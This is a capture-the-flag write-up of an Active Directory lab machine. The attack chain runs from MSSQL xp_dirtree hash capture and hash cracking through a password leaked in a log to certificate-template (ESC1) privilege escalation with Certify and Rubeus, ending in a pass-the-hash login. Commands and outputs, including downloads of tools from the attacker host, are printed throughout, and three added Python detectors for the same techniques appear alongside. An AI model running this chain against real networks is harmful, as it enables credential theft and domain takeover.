
Escape Writeup

  • I'm bringing you an Active Directory machine that touches a bit of MSSQL and shows how to abuse xp_dirtree once inside to capture an NTLMv2 hash, followed by a privilege escalation technique called "Exploiting Certificate Templates". I hope you like it :)!!

Information Gathering / Port Scan

  • We start with the information-gathering phase by running a TCP scan of all ports with nmap

$ nmap -p- --open -sS --min-rate 2000 -vvv -n -Pn -oG allPorts 10.10.11.202

-p- -> scan the full port range (65535)

-sS -> TCP SYN scan. This type of scan is geared toward speed, which is where the versatility mentioned earlier comes from, since it can scan thousands of ports per second on a network that is…

-vvv -> triple verbose so that ports are reported in the terminal as they are discovered

--min-rate 2000 -> send packets no slower than 2000 per second, i.e. very fast

-n -> no DNS resolution, so the scan doesn't slow down

-Pn -> skip host discovery as well

--open -> only scan for and report open ports

$ nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.202 -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-28 11:07 CST
Initiating SYN Stealth Scan at 11:07
Scanning 10.10.11.202 [65535 ports]
Discovered open port 139/tcp on 10.10.11.202
Discovered open port 445/tcp on 10.10.11.202
Discovered open port 53/tcp on 10.10.11.202
Discovered open port 135/tcp on 10.10.11.202
Discovered open port 59426/tcp on 10.10.11.202
Discovered open port 9389/tcp on 10.10.11.202
Discovered open port 49702/tcp on 10.10.11.202
Discovered open port 3269/tcp on 10.10.11.202
Discovered open port 49687/tcp on 10.10.11.202
Discovered open port 636/tcp on 10.10.11.202
Discovered open port 3268/tcp on 10.10.11.202
Discovered open port 49709/tcp on 10.10.11.202
Discovered open port 389/tcp on 10.10.11.202
Discovered open port 88/tcp on 10.10.11.202
Discovered open port 5985/tcp on 10.10.11.202
Discovered open port 593/tcp on 10.10.11.202
Discovered open port 49667/tcp on 10.10.11.202
Discovered open port 464/tcp on 10.10.11.202
Discovered open port 1433/tcp on 10.10.11.202
Discovered open port 49688/tcp on 10.10.11.202
Completed SYN Stealth Scan at 11:07, 26.34s elapsed (65535 total ports)
Nmap scan report for 10.10.11.202
Host is up, received user-set (0.069s latency).
Scanned at 2023-07-28 11:07:30 CST for 27s
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
1433/tcp  open  ms-sql-s         syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49687/tcp open  unknown          syn-ack ttl 127
49688/tcp open  unknown          syn-ack ttl 127
49702/tcp open  unknown          syn-ack ttl 127
49709/tcp open  unknown          syn-ack ttl 127
59426/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.44 seconds
           Raw packets sent: 131063 (5.767MB) | Rcvd: 33 (1.452KB)

We see there are several ports, so I'll run another scan to detect the versions and services running on them

$ nmap -sCV -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49687,49688,49702,49709,59426 10.10.11.202 -oN targetedScan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-28 11:24 CST
Nmap scan report for 10.10.11.202
Host is up (0.071s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-07-29 01:24:56Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-07-29T01:26:26+00:00; +8h00m00s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-07-29T01:26:26+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2023-07-29T01:26:26+00:00; +8h00m00s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-07-29T01:00:01
|_Not valid after:  2053-07-29T01:00:01
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-07-29T01:26:26+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-07-29T01:26:26+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49687/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49688/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49709/tcp open  msrpc         Microsoft Windows RPC
59426/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-07-29T01:25:49
|_  start_date: N/A
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.24 seconds
                                                              

-sCV -> run the default scripts and detect services and versions

-p -> specifying the ports to scan

-oN -> save all our output in nmap format under the name targeted

We see several open ports, so first I'll validate our target over SMB with crackmapexec

$ crackmapexec smb 10.10.11.202                                               
SMB         10.10.11.202    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)

It resolves a domain name, so I'll add it to /etc/hosts. With so many common ports open, and this being a Windows Server acting as a Domain Controller, I'll start by enumerating the network shares with a null session. In this case I'll use smbmap first, logging in as the guest user "guest"

$ smbmap -H 10.10.11.202 -u 'guest'
[+] IP: 10.10.11.202:445	Name: sequel.htb0                                       
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Public                                            	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share

We see a share called Public with read-only access, so I'll enumerate that share with crackmapexec

$ crackmapexec smb 10.10.11.202 -u guest -p '' --spider Public --regex .
SMB         10.10.11.202    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\guest: 
SMB         10.10.11.202    445    DC               [*] Started spidering
SMB         10.10.11.202    445    DC               [*] Spidering .
SMB         10.10.11.202    445    DC               //10.10.11.202/Public/. [dir]
SMB         10.10.11.202    445    DC               //10.10.11.202/Public/.. [dir]
SMB         10.10.11.202    445    DC               //10.10.11.202/Public/SQL Server Procedures.pdf [lastm:'2022-11-19 05:51' size:49551]
SMB         10.10.11.202    445    DC               [*] Done spidering (Completed in 0.45076465606689453)

We see a PDF called "SQL Server Procedures.pdf", so I'll connect with smbclient to download the file

smbclient  -N //10.10.11.202/Public
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Nov 19 05:51:25 2022
  ..                                  D        0  Sat Nov 19 05:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 07:39:43 2022

		5184255 blocks of size 4096. 1475895 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (117.7 KiloBytes/sec) (average 117.7 KiloBytes/sec)

We read the PDF to see its contents. On the first page we can see a username (brandon.brown) and an explanation of how they access the MSSQL server.

And at the end we find a username and password to connect with

xp_dirtree relay attack and cracking the NTLMv2 hash

Now I'll connect with a tool from the impacket suite ("mssqlclient"). We see that execution of xp_dirtree is enabled. xp_dirtree is an extended stored procedure in Microsoft SQL Server that lists the files and folders of a directory on the local file system; when it is given a UNC path, the SQL Server service account authenticates to that remote host. In this case I'll share an SMB server with smbserver and try to capture its NTLMv2 hash
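As an added example, not from the writeup or from impacket, the following Python shows the detection side of the same behaviour: it scans captured T-SQL statements (constructed here, in the form a SQL Server audit or Extended Events trace would record them) for xp_dirtree, xp_fileexist and xp_subdirs calls whose argument is a UNC path to a host outside an allow-list, which is exactly the call that makes the service account send its NTLMv2 response to a remote host.

```python
import re

# Constructed sample of T-SQL statements as an audit trace might capture them
# (not taken from the machine; 10.10.14.3 is the attacker box in the writeup).
SAMPLE_STATEMENTS = [
    "SELECT name FROM sys.databases",
    "EXEC master..xp_dirtree '\\\\10.10.14.3\\share', 1, 1",
    "exec xp_dirtree 'C:\\inetpub\\wwwroot'",
    "EXEC master.sys.xp_fileexist '\\\\fileserver.sequel.htb\\backups\\db.bak'",
    "EXECUTE xp_subdirs N'\\\\203.0.113.7\\x'",
]

# Extended procedures that take a path and will follow a UNC path outbound.
FILE_XPROCS = r"xp_dirtree|xp_fileexist|xp_subdirs"

# EXEC [db.][schema.]xp_proc '\\host\share...'  (optional N prefix on the literal)
UNC_CALL = re.compile(
    r"(?:exec|execute)\s+(?:[\w.]*\.)?(?P<proc>" + FILE_XPROCS + r")"
    r"\s+N?'(?P<path>\\\\[^'\\]+\\[^']*)'",
    re.IGNORECASE,
)


def unc_host(path):
    """'\\\\host\\share\\dir' -> 'host' (lower-cased)."""
    return path.lstrip("\\").split("\\", 1)[0].lower()


def find_unc_xproc_calls(statements, allowed_hosts=()):
    """Return (proc, host, statement) for every call that pushes a UNC path to a
    host not on the allow-list. Local paths (statement 3 above) are ignored:
    they do not trigger an outbound authentication."""
    allowed = {h.lower() for h in allowed_hosts}
    hits = []
    for stmt in statements:
        m = UNC_CALL.search(stmt)
        if m is None:
            continue
        host = unc_host(m.group("path"))
        if host not in allowed:
            hits.append((m.group("proc").lower(), host, stmt))
    return hits


if __name__ == "__main__":
    for proc, host, stmt in find_unc_xproc_calls(SAMPLE_STATEMENTS, ["fileserver.sequel.htb"]):
        print(f"[!] {proc} -> {host}: {stmt}")
```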

Very good :) I'll crack that hash with hashcat

$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

And we have the credentials "REGGIE1234ronnie" for SQL_SVC; now we validate them with crackmapexec over WinRM

$ crackmapexec winrm 10.10.11.202  -u 'SQL_SVC' -p "REGGIE1234ronnie" 
SMB         10.10.11.202    5985   DC               [*] Windows 10.0 Build 17763 (name:DC) (domain:sequel.htb)
HTTP        10.10.11.202    5985   DC               [*] http://10.10.11.202:5985/wsman
WINRM       10.10.11.202    5985   DC               [+] sequel.htb\SQL_SVC:REGGIE1234ronnie (Pwn3d!)

We see that WinRM reports Pwn3d!, which means we can now connect with evil-winrm

Once inside, enumerating the whole system, if we go to the root of the local disk C:\ we find a file where the database logs are stored

I'll download that .BAK. We see the file uses a different encoding, so I'll use iconv to convert it from UTF-16LE to UTF-8 and then grep for any user stored in the logs

I'll tidy up this output to see the user and the password more clearly

$ iconv -f UTF-16LE -t UTF-8 ERRORLOG.BAK  | grep -i "user" | tail -n 7 | awk 'NR==2 || NR==3'                          
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
$ iconv -f UTF-16LE -t UTF-8 ERRORLOG.BAK  | grep -i "user" | tail -n 7 | awk 'NR==2 || NR==3' | awk -F "'" '{print $2}' 
sequel.htb\Ryan.Cooper
NuclearMosquito3
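As an added example (not part of the original writeup), the same search in Python, generalised into a check a defender can run over ERRORLOG: it decodes the UTF-16LE file, parses the failed logons, and flags the pattern seen above, a failure for a real account followed within seconds, from the same client, by a failure whose 'user' does not look like an account name and is therefore probably a password typed into the wrong field. The log lines are constructed for the example and only the two Ryan.Cooper / NuclearMosquito3 entries mirror the writeup.

```python
import re
from datetime import datetime, timedelta

# Constructed ERRORLOG excerpt, encoded UTF-16LE with a BOM like the real file.
SAMPLE_ERRORLOG = ("\ufeff" + "\r\n".join([
    "2022-11-18 13:43:05.12 Logon       Login succeeded for user 'sequel.htb\\sql_svc'. Connection made using Windows authentication. [CLIENT: 127.0.0.1]",
    "2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]",
    "2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]",
    "2022-11-18 13:50:01.00 Logon       Logon failed for user 'sequel.htb\\brandon.brown'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]",
    "2022-11-18 13:50:02.00 Logon       Logon failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]",
])).encode("utf-16-le")

FAILED_LOGON = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\. Reason: (?P<reason>.*?) "
    r"\[CLIENT: (?P<client>[^\]]+)\]$"
)


def decode_errorlog(raw):
    """SQL Server writes ERRORLOG as UTF-16LE; drop the BOM if present."""
    if raw.startswith(b"\xff\xfe"):
        raw = raw[2:]
    return raw.decode("utf-16-le")


def parse_failed_logons(raw):
    """Return the 'Logon failed' entries as dicts with a datetime 'ts'."""
    events = []
    for line in decode_errorlog(raw).splitlines():
        m = FAILED_LOGON.match(line)
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append(ev)
    return events


def looks_like_account(user):
    """Heuristic: domain-qualified names, or plain names made only of letters,
    dots, hyphens and underscores, are accounts; anything with digits or other
    symbols is more likely a password typed into the user-name field."""
    if "\\" in user or "@" in user:
        return True
    return re.fullmatch(r"[A-Za-z][A-Za-z._-]*", user) is not None


def find_credential_leaks(events, window=timedelta(seconds=5)):
    """Pair a failure for a real-looking account with a failure from the same
    client shortly afterwards whose 'user' does not look like an account.
    Returns (account, suspected secret) tuples."""
    leaks = []
    for prev, cur in zip(events, events[1:]):
        if (looks_like_account(prev["user"])
                and not looks_like_account(cur["user"])
                and cur["client"] == prev["client"]
                and timedelta(0) <= cur["ts"] - prev["ts"] <= window):
            leaks.append((prev["user"], cur["user"]))
    return leaks


if __name__ == "__main__":
    for account, secret in find_credential_leaks(parse_failed_logons(SAMPLE_ERRORLOG)):
        print(f"[!] possible password in log for {account}: {secret}")
```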

And we have a new user together with a password, so we validate them with crackmapexec

$ crackmapexec winrm 10.10.11.202  -u 'Ryan.Cooper' -p "NuclearMosquito3" 
SMB         10.10.11.202    5985   DC               [*] Windows 10.0 Build 17763 (name:DC) (domain:sequel.htb)
HTTP        10.10.11.202    5985   DC               [*] http://10.10.11.202:5985/wsman
WINRM       10.10.11.202    5985   DC               [+] sequel.htb\Ryan.Cooper:NuclearMosquito3 (Pwn3d!)

And we have WinRM access again :)! We connect once more with evil-winrm and we have the user flag!!

Privilege Escalation

From the Nmap results we can see many entries related to certificates. This is a strong indication that a Certificate Authority is running. We can use Certify to enumerate possible misconfigurations in Active Directory Certificate Services. "The certificate validity period is usually 1 year and is not tied to any password change. This method can therefore be used for persistence, since the user's NTLM hash can be requested, recovered and cracked." So we import and run the Certify tool to discover certificate templates that are vulnerable

Enumerating vulnerable certificate templates

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe find /vulnerable /currentuser

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using current user's unrolled group SIDs for vulnerability checks.
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

    Enterprise CA Name            : sequel-DC-CA
    DNS Hostname                  : dc.sequel.htb
    FullName                      : dc.sequel.htb\sequel-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=sequel-DC-CA, DC=sequel, DC=htb
    Cert Thumbprint               : A263EA89CAFE503BB33513E359747FD262F91A56
    Cert Serial                   : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Cert Start Date               : 11/18/2022 12:58:46 PM
    Cert End Date                 : 11/18/2121 1:08:46 PM
    Cert Chain                    : CN=sequel-DC-CA,DC=sequel,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : dc.sequel.htb\sequel-DC-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
        WriteOwner Principals       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519



Certify completed in 00:00:09.9950949

We can see that there is indeed a vulnerable template called UserAuthentication

The exploitation for that template is in this PoC
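As an added example, not Certify's own code, the following Python turns the Certify output above into an audit check: it parses one template block in the layout Certify prints and evaluates the four ESC1 preconditions (enrollee supplies the subject, no manager approval or authorized signature, an authentication EKU, and enrollment rights for a low-privileged group). The vulnerable block reproduces the writeup's template; the hardened block is a constructed "after" state with the enrollee-supplied subject removed and CA manager approval required, and the check returns no ESC1 finding for it.

```python
import re

# Constructed excerpt in Certify's "find /vulnerable" layout; names and SIDs
# are the ones shown in the writeup.
VULNERABLE_TEMPLATE = """\
    CA Name                               : dc.sequel.htb\\sequel-DC-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
"""

# Constructed remediated state: subject built from the UPN, and every request
# held for CA manager approval (PEND_ALL_REQUESTS).
HARDENED_TEMPLATE = VULNERABLE_TEMPLATE.replace(
    "ENROLLEE_SUPPLIES_SUBJECT", "SUBJECT_ALT_REQUIRE_UPN"
).replace(
    "INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS",
    "INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, PEND_ALL_REQUESTS",
)

AUTH_EKUS = {"client authentication", "smart card logon",
             "pkinit client authentication", "any purpose"}
LOW_PRIV_PRINCIPALS = {"domain users", "domain computers",
                       "authenticated users", "everyone", "users"}

KEY_VALUE = re.compile(r"^\s*(?P<key>[^:]+?)\s*:\s*(?P<val>.*?)\s*$")


def parse_certify_template(block):
    """One Certify template block -> {lowercase key: value}. Continuation lines
    under 'Enrollment Rights' (no colon) are appended newline-separated."""
    fields, last_key = {}, None
    for line in block.splitlines():
        m = KEY_VALUE.match(line)
        if m:
            last_key = m.group("key").lower()
            fields[last_key] = m.group("val")
        elif last_key == "enrollment rights" and line.strip():
            fields[last_key] += "\n" + line.strip()
        else:
            last_key = None  # section headers such as "Permissions" end a list
    return fields


def principals(value):
    """'sequel\\Domain Users   S-1-5-...' entries -> ['sequel\\Domain Users', ...]."""
    return [re.split(r"\s{2,}", e.strip())[0] for e in value.split("\n") if e.strip()]


def esc1_findings(block):
    """Return the ESC1 preconditions this template satisfies."""
    f = parse_certify_template(block)
    findings = []
    if "ENROLLEE_SUPPLIES_SUBJECT" in f.get("mspki-certificate-name-flag", ""):
        findings.append("enrollee supplies subject/SAN")
    if ("PEND_ALL_REQUESTS" not in f.get("mspki-enrollment-flag", "")
            and f.get("authorized signatures required", "0").strip() == "0"):
        findings.append("no manager approval or signature required")
    ekus = {e.strip().lower() for e in f.get("pkiextendedkeyusage", "").split(",") if e.strip()}
    if not ekus or ekus & AUTH_EKUS:  # empty EKU list means any purpose
        findings.append("EKU allows authentication")
    if any(p.split("\\")[-1].lower() in LOW_PRIV_PRINCIPALS
           for p in principals(f.get("enrollment rights", ""))):
        findings.append("low-privileged principals can enroll")
    return findings


def is_esc1(block):
    """ESC1 needs all four preconditions at once."""
    return len(esc1_findings(block)) == 4


if __name__ == "__main__":
    for name, block in (("vulnerable", VULNERABLE_TEMPLATE), ("hardened", HARDENED_TEMPLATE)):
        print(name, "ESC1" if is_esc1(block) else "not ESC1", esc1_findings(block))
```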

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template                : UserAuthentication
[*] Subject                 : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName                 : Administrator

[*] Certificate Authority   : dc.sequel.htb\sequel-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 10

[*] cert.pem         :



[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:13.6141665

We have just retrieved a certificate, but it's in PEM format. To use Rubeus and obtain the Administrator's NTLM hash we need to convert the certificate to PFX, and we can do that with openssl

$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Now we upload the resulting file, named "cert.pfx", along with Rubeus

Requesting TGT with Certificate

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> curl 10.10.14.3/cert.pfx -o cert.pfx

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> curl  10.10.14.3/Rubeus.exe -o Rubeus.exe

Once we have the certificate in cert.pfx, we can request a Kerberos TGT for the "Administrator" user

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::816e:8bd0:4750:7250%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):


  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  Administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  8/3/2023 8:44:47 AM
  EndTime                  :  8/3/2023 6:44:47 PM
  RenewTill                :  8/10/2023 8:44:47 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  1sAog8wYMtnsJMbAtZ6BNA==
  ASREP (key)              :  27415D6D6D2DB085B6A6BCBC5EFC7A5E

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : A52F78E4C751E5F5E17E1E9F3E58F4EE

Now with this NTLM hash we can authenticate with evil-winrm as Administrator

evil-winrm -i 10.10.11.202 -u 'Administrator' -H 'A52F78E4C751E5F5E17E1E9F3E58F4EE'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator

And another machine pwned :D!!

This post is licensed under CC BY 4.0 by the author.